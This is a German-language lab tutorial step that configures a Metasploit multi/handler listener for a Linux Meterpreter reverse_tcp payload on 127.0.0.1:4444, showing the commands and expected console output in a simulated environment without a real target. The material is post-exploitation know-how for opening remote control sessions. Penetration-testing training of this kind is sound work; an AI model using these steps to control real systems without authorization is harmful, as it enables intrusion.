Einrichten einer Meterpreter Payload und eines Listeners
In diesem Schritt lernen Sie, wie Sie eine Meterpreter Payload einrichten und einen Listener starten, um den Zugriff auf eine Session auf einem kompromittierten System zu simulieren. Da dies eine simulierte Lab-Umgebung ohne echtes Ziel ist, wird keine tatsächliche Session erstellt, aber Sie werden den Prozess der Vorbereitung auf Post-Exploitation-Aufgaben verstehen.
Meterpreter ist eine erweiterte Payload in Metasploit, die eine leistungsstarke interaktive Shell für Post-Exploitation-Aktivitäten wie Dateisystemnavigation und Prozessverwaltung bietet. Im Gegensatz zu einer einfachen Reverse Shell bietet Meterpreter mehr Funktionen zur Steuerung eines kompromittierten Systems. Eine Session in Metasploit ist eine aktive Verbindung zwischen Ihnen und dem Ziel, die die Ausführung von Befehlen ermöglicht.
Da der vorherige Exploit nicht zu einer Session geführt hat, verwenden Sie einen eigenständigen Handler, um einen Meterpreter Listener einzurichten. Wenn Sie sich noch in der Metasploit-Konsole befinden, geben Sie den folgenden Befehl ein, um zum Modul multi/handler zu wechseln, und drücken Sie Enter
:
use exploit/multi/handler
Die Eingabeaufforderung sollte sich ändern zu:
msf6 exploit(multi/handler) >
Konfigurieren Sie nun den Handler, um eine Meterpreter Payload für Linux-Systeme zu verwenden. Geben Sie den folgenden Befehl ein und drücken Sie Enter
:
set payload linux/x86/meterpreter/reverse_tcp
Die Ausgabe bestätigt:
payload => linux/x86/meterpreter/reverse_tcp
Als Nächstes legen Sie die Listener-Optionen fest. Verwenden Sie 127.0.0.1
als IP-Adresse (LHOST
), da dies eine Simulation auf demselben Rechner ist. Geben Sie den folgenden Befehl ein und drücken Sie Enter
:
set LHOST 127.0.0.1
Die Ausgabe bestätigt:
LHOST => 127.0.0.1
Setzen Sie den Port (LPORT
) auf 4444
. Geben Sie den folgenden Befehl ein und drücken Sie Enter
:
set LPORT 4444
Die Ausgabe bestätigt:
LPORT => 4444
Überprüfen Sie die Einstellungen, indem Sie den folgenden Befehl eingeben und Enter
drücken:
show options
Suchen Sie nach dem Abschnitt Payload options
, der Folgendes anzeigen sollte:
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Wenn die Werte falsch sind, wiederholen Sie die set
-Befehle, um sie zu korrigieren.
Starten Sie schließlich den Listener, indem Sie den folgenden Befehl eingeben und Enter
drücken:
exploit
Metasploit beginnt, auf der angegebenen IP und dem angegebenen Port zu lauschen. Da sich kein echtes Ziel zurückverbindet, wird keine Session erstellt. Die Ausgabe sieht so aus:
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Starting the payload handler...
Die Konsole bleibt aktiv und wartet auf eine Verbindung. In einem realen Szenario, wenn sich ein Ziel mit der Meterpreter Payload verbindet, würde eine Session eingerichtet, und Sie würden eine Meldung wie Meterpreter session 1 opened
sehen. Beenden Sie vorerst den Listener, indem Sie Ctrl + C
drücken, um den Prozess zu unterbrechen.
Dieser Schritt hilft Ihnen zu verstehen, wie Sie eine Meterpreter Payload und einen Listener vorbereiten, eine entscheidende Fähigkeit für die Post-Exploitation im Penetration Testing. Sie können die Metasploit-Konsole nun bei Bedarf verlassen, indem Sie exit
eingeben und Enter
drücken.